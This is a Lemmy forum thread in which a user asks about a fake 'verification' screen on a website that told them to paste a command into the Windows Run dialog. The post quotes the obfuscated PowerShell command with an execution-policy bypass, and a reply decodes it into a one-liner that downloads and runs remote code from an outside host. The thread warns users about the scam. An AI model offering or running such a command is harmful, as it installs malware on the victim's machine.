StarvingMartist@sh.itjust.works to

Windows 11@lemmy.worldEnglish · 14 days ago

What does this command do that this website wants me to "verify" myself by running in the run window?

17

What does this command do that this website wants me to "verify" myself by running in the run window?

StarvingMartist@sh.itjust.works to

Windows 11@lemmy.worldEnglish · 14 days ago

Yeah don’t put this in but can anyone give me an idea of what they were trying to do? the website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real pc verification screen to try to get me to put this in Run

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

Chat

aubeynarf@lemmynsfw.com
link
fedilink
English
arrow-up
21·
14 days ago
The base 64 encoded payload is:
$site = Invoke-RestMethod 'https://mastraw.top/me/day'; iEx $site

it would download malware and install it on your machine

Windows 11@lemmy.world

windows11@lemmy.world

You are not logged in. However you can subscribe from another Fediverse account, for example Lemmy or Mastodon. To do this, paste the following into the search field of your instance: [email protected]

Welcome to the community for Windows 11, Microsoft’s latest computer operating system.

Rules:

Do not promote pirated content or grey market keys.
Be civil. No rude, offensive, or hateful posts/comments.

Visibility: Public

This community can be federated to other instances and be posted/commented in by their users.

1 user / day
1 user / week
84 users / month
84 users / 6 months
1 local subscriber
1.07K subscribers
51 Posts
23 Comments
Modlog

mods:
uidev@lemmy.world